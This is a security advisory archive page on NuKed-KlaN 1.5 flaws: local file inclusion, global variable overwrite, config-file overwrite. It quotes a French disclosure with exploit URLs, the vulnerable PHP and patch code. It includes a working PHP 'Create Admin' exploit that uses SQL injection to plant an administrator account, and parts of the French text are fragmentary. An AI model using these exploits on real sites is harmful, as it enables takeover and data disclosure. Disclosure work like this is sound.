SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   NuKed-KlaN Vendors:   nuked-klan.org
NuKed-KlaN Input Validation Bugs Disclose Files to Remote Users and Let Remote Users Include Local Files
SecurityTracker Alert ID:  1009737
SecurityTracker URL:  http://securitytracker.com/id/1009737
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 12 2004
Impact:   Denial of service via network, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 1.5 SP2 and prior versions
Description:   Some vulnerabilities were reported in NuKed-KlaN. A remote user can view files on the target system. A remote user can also include and execute files located on the target system and can overwrite the configuration file.

frog-m@n reported that a remote user can create a URL with a specially crafted $language variable to view files on the target system with the privileges of the web service. A demonstration exploit URL is provided:

http://[target]/index.php?user_langue=../../../../../file/to/view

It is also reported that a remote user can submit a specially crafted URL to redefine global variables. This allows the remote user to include and execute files that are located on the target system. A demonstration exploit URL is provided:

http://[target]/index.php?file=..&page=globals

It is also reported that 'update.php' function allows a remote user to overwrite the site's configuration file, causing denial of service conditions.

Impact:   A remote user can view files on the target system with the privileges of the target web service.

A remote user can include and execute scripting files located on the target system.

A remote user can cause the configuration file to be overwritten.

Solution:   The vendor has released a patch, available at:

http://nk.gamez.solexine.fr/index.php?file=Download&op=description&dl_id=194

Vendor URL:  www.nuked-klan.org/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  http://www.phpsecure.info/v2/tutos/frog/Nuked-KlaN.txt


http://www.phpsecure.info/v2/tutos/frog/Nuked-KlaN.txt

							Nuked-KlaN
							**********
Informations :
Langage : PHP
Version : b1.5, b1.4 (et moins?)
Website : http://www.nuked-klan.org
- Ecrasement du fichier de configuration
- Inclusions de fichiers internes

Developpement :
Nuked-KlaN est un CMS complet avec plusieurs modules et permettant le rajout d'autres 
encore, bref du style PHP-Nuke.
----------------------
include ("nuked.php");
----------------------
Dans ce fichier nuked.php, on voit les lignes :
---------------------------------------------------
[...]
include ("conf.inc.php");
[...]
if ($user_langue == ""){$language=$nuked[langue];}
else {$language=$user_langue;}

include ("lang/$language");
[...]
---------------------------------------------------
Un fichier "lang/$language" est donc inclut.
On pourra donc inclure n'importe quel fichier du disque dur avec une url du type :
http://[target]/index.php?user_langue=../../../../../file/to/view
et ce dans les versions b1.5 et moins.

Dans cette version b1.5 uniquement se trouvent plusieurs autres failles.
Dans le fichier globals.php se trouvent les lignes suivantes :
-------------------------------
[...]
nk_globals('HTTP_GET_VARS');
nk_globals('HTTP_POST_VARS');
nk_globals('HTTP_COOKIE_VARS');
nk_globals('HTTP_SERVER_VARS');
[...]
-------------------------------
---------------------------------------------------
function nk_globals($table) {
if (is_array($GLOBALS[$table])) {
reset($GLOBALS[$table]);
while (list($key, $val) = each($GLOBALS[$table])) {
$GLOBALS[$key] = $val;
	        }
	}
}
---------------------------------------------------
trouvent dans la variable $table.
variables SERVER.
les variables GET POST COOKIE
fait que ces variables
anciennes valeurs.


le code :
-------------------------------------------------------
[...]
if($page!=""){$im_file="$page";}else{$im_file="index";}
}

if (is_file("modules/$file/$im_file.php") ){
include("modules/$file/$im_file.php");
}else{
include("modules/404/index.php");
}
[...]
-------------------------------------------------------
http://[target]/index.php?file=..&page=globals
exemple avec l'url :
http://[target]/index.php?user_langue=../globals.php
configuration dans n'importe
quel module ! Par exemple dans le module Suggest (modules/Suggest/index.php), on voit :
---------------------------------------------------------------------------------------------------------------
[...]
function add_sug($data)
{
global $user, $module, $nuked;

opentable();

include("modules/Suggest/modules/$module.php");
$date=time();
$content=make_array($data);
$sql=mysql_query("INSERT INTO $nuked[prefix]"._suggest." VALUES 
('','$module','$user[0]','$content','$date')");
echo"<br><center>"._YOURSUGGEST."<br>"._THXPART."</center><br>";
redirect("index.php?file=$module",2);

closetable();
}
[...]
---------------------------------------------------------------------------------------------------------------
enregistrement dans n'importe quelle table.
----------------------------------------------------------------------------------------------------------------------------
<html>
<head>
<title>Nuked-KlaN b1.5 Create Admin</title>
</head>
<body>
<?
function ascii_sql($str) {
for ($i=0;$i < strlen($str);$i++) {
if ($i == strlen($str)-1){
$ascii_char.=ord(substr($str,$i));
}else{
$ascii_char.=ord(substr($str,$i)).',';
}
}
return $ascii_char;
}

if (isset($_POST["submit"])){

echo 
"<script>url='".$target."/index.php?file=Suggest&op=add_sug&user_langue=../globals.php&nuked[prefix]=nuked_users%20(id,pseudo,pass,niveau)%20VALUES%20(12345,char(".ascii_sql($_POST["pseudo"])."),md5(char(".ascii_sql($_POST["pass"]).")),9)/*&module
=Gallery';window.open(url);</script>";
echo "<br><br><br><br>Admin should have been created.";

}else{
?>

<form method="POST" action="<? echo $PHP_SELF; ?>">
<b>Target :</b> <input type="text" name="target" value="http://"><br>
<b>Admin Nick :</b> <input type="text" name="pseudo"><br>
<b>Admin Pass :</b> <input type="text" name="pass"><br>
<input type="submit" name="submit" value="Create Admin">
</form>
<?
}
?>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------------

On y trouve le code :
----------------------------------------------------------------------------------
<?

[...]

include ("globals.php");

[...]

function install()
{
global $langue;
include ("lang/$langue");

[...]
}
[...]


function edit_config($op)
{
global $langue,$langname;

include ("lang/$langue");

[...]
}
[...]

function update_config($vars)
{
[...]
include ("lang/$vars[langue]");
[...]
   $content = "<?php // Generated: $d\n"
	[...]
         ."\$global['db_host']  = '$vars[db_host]';\n"
	."\$global['db_user']  = '$vars[db_user]';\n"
         ."\$global['db_pass']  = '$vars[db_pass]';\n"
	."\$global['db_name']  = '$vars[db_name]';\n"
	."\$global['type']     = '$vars[type]';\n"
      	."\$nuked['prefix']    = \"$vars[prefix]\";\n"
	[...]
         ."\$nuked['url'] = '$vars[url]';\n"
	[...]
	.'?'.'>';
	
	
	$fp = fopen('conf.inc.php', w);
     	if (!$fp) die (sprintf('Erreur File Open','conf.inc.php','conf.inc.php'));
     	fwrite($fp, $content);
     	fclose($fp);
[...]
}

[...]

switch ($action)
{
[...]
case"edit_config":
edit_config($_GET['op']);
break;

case"update_config":
update_config($_POST);
break;

case"install":
install();
break;
[...]
}

?>
----------------------------------------------------------------------------------

mettant le site down.

ce fameux fichier globals.php.

Solution :
Un patch est disponible sur phpSecure ( http://www.phpsecure.info ).
Dans globals.php, il faut remplacer les lignes :
-------------------------------
nk_globals('HTTP_GET_VARS');
nk_globals('HTTP_POST_VARS');
nk_globals('HTTP_COOKIE_VARS');
nk_globals('HTTP_SERVER_VARS');
-------------------------------
par :
---------------------------------------
if (!get_ini("register_globals")){
	nk_globals('HTTP_GET_VARS');
	nk_globals('HTTP_POST_VARS');
	nk_globals('HTTP_COOKIE_VARS');
	nk_globals('HTTP_SERVER_VARS');
}
---------------------------------------

Et dans nuked.php, remplacer les lignes :
----------------------------------------------------
function nk_globals($table) {
if (is_array($GLOBALS[$table])) {
reset($GLOBALS[$table]);
while (list($key, $val) = each($GLOBALS[$table])) {
$GLOBALS[$key] = $val;
	        }
	}
}
----------------------------------------------------
par:
-----------------------------------------------------------------------------
function nk_globals($table) {
	if (is_array($GLOBALS[$table])) {
		reset($GLOBALS[$table]);
		while (list($key, $val) = each($GLOBALS[$table])) {
			if (!isset($GLOBALS[$key])){ $GLOBALS[$key] = $val; }
	        }
	}
}
-----------------------------------------------------------------------------

--------------------------------------------------
if ($user_langue == ""){$language=$nuked[langue];}
else {$language=$user_langue;}
--------------------------------------------------
ajouter les lignes :
-----------------------------------------------------------------------
if ( eregi("\.\.",$theme) || eregi("\.\.",$page) || eregi("\.\.",$file)
     || eregi("\0",$theme) || eregi("\0",$page) || eregi("\0",$file) ||
     eregi("\.\.",$user_langue) || !file_exists("lang/$language") ){
	die("What are you trying to do ?");
}
-----------------------------------------------------------------------

Credits :
Auteur : frog-m@n
E-mail : leseulfrog@hotmail.com
Website : http://www.phpsecure.info
Date : 23/03/04


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC